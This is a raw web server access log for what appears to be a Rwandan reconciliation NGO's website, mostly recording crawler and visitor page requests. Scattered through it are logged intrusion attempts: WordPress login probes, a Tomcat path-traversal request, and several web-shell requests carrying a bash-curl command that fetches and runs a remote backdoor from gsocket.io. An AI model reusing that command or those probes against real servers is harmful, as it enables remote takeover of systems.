34.174.207.63 - - [15/Sep/2025:21:12:33 +0200] "GET /kin/blog-detail.php?title=nyaruguru:-abivuriza-ku-bitaro-bya-munini-barishimira-ko-ikarita-nsuzumamikorere-yakozwe-na-ami-yabafashije-kubona-serivisi-nziza HTTP/1.1" 200 20709 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:33 +0200] "GET /en/documentary_film.php HTTP/1.1" 200 22990 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:33 +0200] "GET /kin/blog-detail.php?title=nyabihu-association-modeste-et-innocent-yatoje-amaboko-mahire-abitabiriye-imurikabikorwa-ryabafatanyabikorwa-mu-iterambere HTTP/1.1" 200 19207 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:33 +0200] "GET /kin/blog-detail.php?title=huye:-ibiganiro-mvuramibanire-byabafashije-kwiyunga- HTTP/1.1" 200 20513 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:33 +0200] "GET /kin/blog-detail.php?title=huye:-ami-n%E2%80%99abiga-muri-st-marys-high-school-kiruhura-bizihije-umunsi-mupuzamahanga-wamahoro-2024 HTTP/1.1" 200 18431 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=abo-mu-mataba-ya-kayonza-basangijwe-amateka-nabi-nyanza-bashima-intambwe-bagezeho-bimakaza-ubumwe-nubudaheranwa HTTP/1.1" 200 20168 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=nyuruguru:-ami-irashimira-ubuyobozi-ku-bufatanye-bwintangarugero-bwaranze-impande-zombi-mu-myaka-18-ishize- HTTP/1.1" 200 18938 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=ihuririro-ryubumwe-nubudaheranwa-bwabanyarwanda-ryashimye-ibikorwa-bya-ami HTTP/1.1" 200 19108 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=nyuma-yo-kwiyunga-batereye-hamwe-igiti-cyamahoro-nkigihango HTTP/1.1" 200 23355 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/photo.php HTTP/1.1" 200 41044 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=nyanza:-ami-yahuguye-abunzi-kuri-tekinini-zubuhuza-na-politiki-yo-gukemura-amakimbirane-hatisunzwe-inkiko HTTP/1.1" 200 18210 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=huye:-abo-ami-yavanye-mu-muhanda-ikabigisha-imyuga-batangiye-kwiteza-imbere HTTP/1.1" 200 17137 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /en/quelques_realization.php HTTP/1.1" 200 18816 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/ubuntu.php HTTP/1.1" 200 23145 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/team.php HTTP/1.1" 200 32045 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /en/blog-detail.php?title=kigali:-ami-in-collaboration-with-cejp-rwanda-organized-a-brainstorming-workshop-on-gbv- HTTP/1.1" 200 20592 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=nyanza:--ami-yifatanyije-nabaturage-gutangiza-ukwezi-kwahariwe-kuzirikana-ubumwe-nubudaheranwa-bwabanyarwanda-2024 HTTP/1.1" 200 19350 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /en/blog-detail.php?title=nyaruguru:-visitors-from-the-three-belgium-schools-appricieted-the-activities-of--amataba-groups HTTP/1.1" 200 20508 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/psycho_socio-economic_framework.php HTTP/1.1" 200 14905 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=nyaruguru:-imiryango-120-iri-mu-kanyamuneza-nyuma-yo-gufashwa-na-ami-kuva-mu-makimbirane- HTTP/1.1" 200 20787 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/objectifs.php HTTP/1.1" 200 15574 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /en/blog-detail.php?title=-nyaruguru-murama:-ami-organized-a-radio-program-live-talk-show-on-services-delivery HTTP/1.1" 200 23 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /en/strengthening_citizen_participation_in_the_life_of_the_city.php HTTP/1.1" 200 15946 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=huye:-uko-ami-yigishije-imyuga-nubumenyingiro-abana-bo-mu-muhanda-bakava-mu-buzima-bubi-barimo HTTP/1.1" 200 17968 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /en/photo.php HTTP/1.1" 200 42002 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=nyaruguru:-bashimye-uruhare-rwa-ami-mu-bukangurambaga-bwo-kurwanya-ihohoterwa-rishingiye-ku-gitsina HTTP/1.1" 200 18021 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=huye-gishamvu:-ami-yakoze-ubukangurambaga-kuri-politiki-yo-gukemura-amakimbirane-hatisunzwe-inkiko HTTP/1.1" 200 18777 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /en/domaine_de_Travail.php HTTP/1.1" 200 15895 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
34.174.207.63 - - [15/Sep/2025:21:12:34 +0200] "GET /kin/blog-detail.php?title=nyaruguru-mata:-barishimira-ibiganiro-bahawe-na-ami-kuri-politiki-yo-gukemura-amakimbirane-hatisunzwe-inkiko HTTP/1.1" 200 18579 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36"
43.159.128.237 - - [15/Sep/2025:21:14:04 +0200] "GET /blog-detail.php?title=huye:-ami-et-st-mary HTTP/1.1" 200 23 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
2.189.5.142 - - [15/Sep/2025:21:15:01 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
2.189.5.162 - - [15/Sep/2025:21:16:46 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; Linux x86_64; rv:10.0) Gecko/20100101 Firefox/10.0"
170.106.84.136 - - [15/Sep/2025:21:25:00 +0200] "GET /blog-detail.php?title=histoire-de-succ HTTP/1.1" 200 23 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
197.243.3.197 - - [15/Sep/2025:21:25:48 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
185.146.234.68 - - [15/Sep/2025:21:30:58 +0200] "POST /userentry?accountId=/../../../tomcat/webapps/4df9d/&symbolName=test&base64UserName=YWRtaW4= HTTP/1.1" 404 - "-" "Mozilla/5.0 (Ubuntu; Linux x86_64; rv:122.0) Gecko/20100101 Firefox/122.0"
2.189.5.142 - - [15/Sep/2025:21:31:29 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-T550 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Safari/537.36"
2.189.5.162 - - [15/Sep/2025:21:31:29 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Android 13; Mobile; rv:109.0) Gecko/118.0 Firefox/118.0"
43.165.69.68 - - [15/Sep/2025:21:32:55 +0200] "GET /blog-detail.php?title=huye:-ami-forme-25-jeunes-sur-la-culture-de-la-paix HTTP/1.1" 200 23610 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_2_3 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.0.3 Mobile/15E148 Safari/604.1"
2.189.5.118 - - [15/Sep/2025:21:33:13 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
197.243.3.197 - - [15/Sep/2025:21:35:35 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
2.189.5.142 - - [15/Sep/2025:21:41:01 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
2.189.5.162 - - [15/Sep/2025:21:43:13 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
197.243.3.197 - - [15/Sep/2025:21:45:24 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
40.77.167.17 - - [15/Sep/2025:21:48:52 +0200] "GET /admin/images/photos/Gbr4aUNagAAwdAT.jpg HTTP/1.1" 200 73840 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
156.228.117.237 - - [15/Sep/2025:21:56:20 +0200] "GET /wp-login.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
156.228.86.99 - - [15/Sep/2025:21:56:20 +0200] "GET /wp-login.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
154.213.160.22 - - [15/Sep/2025:21:56:21 +0200] "GET /wp-login.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/115.0.0.0 Safari/537.36 Edg/115.0.1901.203"
197.243.3.197 - - [15/Sep/2025:21:59:42 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
109.123.250.225 - - [15/Sep/2025:22:00:32 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
109.123.250.225 - - [15/Sep/2025:22:00:35 +0200] "GET /kin/blog-detail.php?title=huye:-ami-n%E2%80%99abiga-muri-st-marys-high-school-kiruhura-bizihije-umunsi-mupuzamahanga-wamahoro-2024 HTTP/1.1" 200 18431 "-" "Mozilla/5.0 (compatible; MJ12bot/v1.4.8; http://mj12bot.com/)"
2.189.5.118 - - [15/Sep/2025:22:05:03 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
2.189.5.142 - - [15/Sep/2025:22:06:26 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Android 4.4; Mobile; rv:41.0) Gecko/41.0 Firefox/41.0"
217.182.92.119 - - [15/Sep/2025:22:06:29 +0200] "GET /robots.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; HaloBot/1.0; +bot@haloscan.com; +https://www.haloscan.com/)"
217.182.92.119 - - [15/Sep/2025:22:06:36 +0200] "GET /tag/safari/ HTTP/1.1" 404 - "-" "Mozilla/5.0 (compatible; HaloBot/1.0; +bot@haloscan.com; +https://www.haloscan.com/)"
2.189.5.162 - - [15/Sep/2025:22:09:27 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPhone; CPU iPhone OS 12_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0 Mobile/15E148 Safari/604.1"
2.189.5.142 - - [15/Sep/2025:22:09:38 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Linux; Android 11; Lenovo YT-J706X) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36"
2.189.5.162 - - [15/Sep/2025:22:09:47 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
52.167.144.197 - - [15/Sep/2025:22:10:00 +0200] "GET /kin/index.php/feature/sale2411-5/blog-detail.php?title=karongi-abagize-uruhare-muri-jenoside-yakorewe-abatutsi-barashima-ibiganiro-bibategura-kubana-neza-n%C3%83%C2%A2%C3%A2%E2%80%9A%C2%AC%C3%A2%E2%80%9E%C2%A2abarokotse-jenoside- HTTP/1.1" 200 73632 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
197.243.3.197 - - [15/Sep/2025:22:14:40 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
40.77.167.35 - - [15/Sep/2025:22:16:30 +0200] "GET /en/index.php HTTP/1.1" 200 41763 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.167.35 - - [15/Sep/2025:22:24:12 +0200] "GET /en/index.php/product/edit/leader.jpg HTTP/1.1" 200 41763 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
197.243.3.197 - - [15/Sep/2025:22:29:22 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
202.178.123.91 - - [15/Sep/2025:22:31:42 +0200] "GET /local/moodle_webshell/webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 - "-" "python-requests/2.32.3"
202.178.123.91 - - [15/Sep/2025:22:31:47 +0200] "GET /cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 16 "-" "python-requests/2.32.3"
202.178.123.91 - - [15/Sep/2025:22:31:53 +0200] "GET /exec.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 16 "-" "python-requests/2.32.3"
202.178.123.91 - - [15/Sep/2025:22:31:58 +0200] "GET /modules/mod_webshell/mod_webshell.php?action=exec&cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 - "-" "python-requests/2.32.3"
202.178.123.91 - - [15/Sep/2025:22:32:05 +0200] "GET /uploads/cmd.php?cmd=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 - "-" "python-requests/2.32.3"
202.178.123.91 - - [15/Sep/2025:22:32:10 +0200] "GET /wp-content/cmd.php?exec=bash%20-c%20%22$(curl%20-fsSL%20https://gsocket.io/y)%22 HTTP/1.1" 404 16 "-" "python-requests/2.32.3"
2.189.5.142 - - [15/Sep/2025:22:33:03 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Linux; Android 5.0.2; SAMSUNG SM-T550 Build/LRX22G) AppleWebKit/537.36 (KHTML, like Gecko) SamsungBrowser/3.3 Chrome/38.0.2125.102 Safari/537.36"
2.189.5.162 - - [15/Sep/2025:22:35:45 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (X11; Fedora; Linux x86_64; rv:115.0) Gecko/20100101 Firefox/115.0"
2.189.5.118 - - [15/Sep/2025:22:35:49 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPhone14,3; U; CPU iPhone OS 15_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/19A346 Safari/602.1"
197.243.3.197 - - [15/Sep/2025:22:44:15 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
45.82.40.57 - - [15/Sep/2025:22:45:44 +0200] "GET /wp-json/wp/v2/pages/7 HTTP/1.1" 404 - "-" "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.3"
2.189.5.142 - - [15/Sep/2025:22:47:20 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPhone13,2; U; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/15E148 Safari/602.1"
2.189.5.162 - - [15/Sep/2025:22:47:20 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Safari/537.36 Edge/12.246"
52.167.144.199 - - [15/Sep/2025:22:48:54 +0200] "GET /mission.php HTTP/1.1" 200 16101 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:22:49:03 +0200] "GET /mission.php HTTP/1.1" 200 16101 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
44.197.76.210 - - [15/Sep/2025:22:50:53 +0200] "GET /en/strengthening_citizen_participation_in_the_life_of_the_city.php HTTP/1.1" 200 15946 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; Amazonbot/0.1; +https://developer.amazon.com/support/amazonbot) Chrome/119.0.6045.214 Safari/537.36"
103.74.76.197 - - [15/Sep/2025:22:50:56 +0200] "GET /wp-login.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.74.76.197 - - [15/Sep/2025:22:50:57 +0200] "GET /wp-login.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.74.76.197 - - [15/Sep/2025:22:50:57 +0200] "POST /wp-login.php HTTP/1.1" 404 16 "https://ami.rw/wp-login.php" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.74.76.197 - - [15/Sep/2025:22:50:57 +0200] "GET /wp-admin/ HTTP/1.1" 500 - "-" "Mozilla/5.0 (Windows NT 10.0; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0"
103.74.76.197 - - [15/Sep/2025:22:50:58 +0200] "GET /wp-login.php HTTP/1.1" 404 16 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/138.0.0.0 Safari/537.36"
52.167.144.198 - - [15/Sep/2025:22:55:56 +0200] "GET /blog-detail.php/feature/osu_main/historique.php HTTP/1.1" 200 4831 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/116.0.1938.76 Safari/537.36"
197.243.3.197 - - [15/Sep/2025:22:59:14 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/126.0.0.0 Safari/537.36"
2.189.5.142 - - [15/Sep/2025:22:59:42 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPhone13,2; U; CPU iPhone OS 14_0 like Mac OS X) AppleWebKit/602.1.50 (KHTML, like Gecko) Version/10.0 Mobile/15E148 Safari/602.1"
2.189.5.162 - - [15/Sep/2025:23:02:37 +0200] "GET / HTTP/1.1" 200 44657 "-" "Mozilla/5.0 (iPod touch; CPU iPhone OS 13_6 like Mac OS X) AppleWebKit/604.5.6 (KHTML, like Gecko) FxiOS/118.0 Mobile/15E148 Safari/605.1.15"
139.91.70.79 - - [15/Sep/2025:23:02:44 +0200] "GET /sellers.json HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0"
139.91.70.79 - - [15/Sep/2025:23:02:44 +0200] "GET /ads.txt HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0"
40.77.178.48 - - [15/Sep/2025:23:05:19 +0200] "GET /mission.php HTTP/1.1" 200 16101 "-" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:27 +0200] "GET /js/active.js HTTP/1.1" 200 5631 "https://ami.rw/mission.php" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:28 +0200] "GET /style.css HTTP/1.1" 200 82586 "https://ami.rw/mission.php" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:40 +0200] "GET /js/bootstrap/popper.min.js HTTP/1.1" 200 20336 "https://ami.rw/mission.php" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:44 +0200] "GET /css/animate.css HTTP/1.1" 200 57095 "https://ami.rw/style.css" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:45 +0200] "GET /css/elegant-icon.css HTTP/1.1" 200 25252 "https://ami.rw/style.css" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:46 +0200] "GET /css/bootstrap.min.css HTTP/1.1" 200 140936 "https://ami.rw/style.css" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:47 +0200] "GET /css/classy-nav.css HTTP/1.1" 200 22269 "https://ami.rw/style.css" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:47 +0200] "GET /css/owl.carousel.min.css HTTP/1.1" 200 2936 "https://ami.rw/style.css" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:47 +0200] "GET /css/magnific-popup.css HTTP/1.1" 200 5599 "https://ami.rw/style.css" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
40.77.178.48 - - [15/Sep/2025:23:05:48 +0200] "GET /css/font-awesome.min.css HTTP/1.1" 200 31000 "https://ami.rw/style.css" "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm) Chrome/136.0.0.0 Safari/537.36"
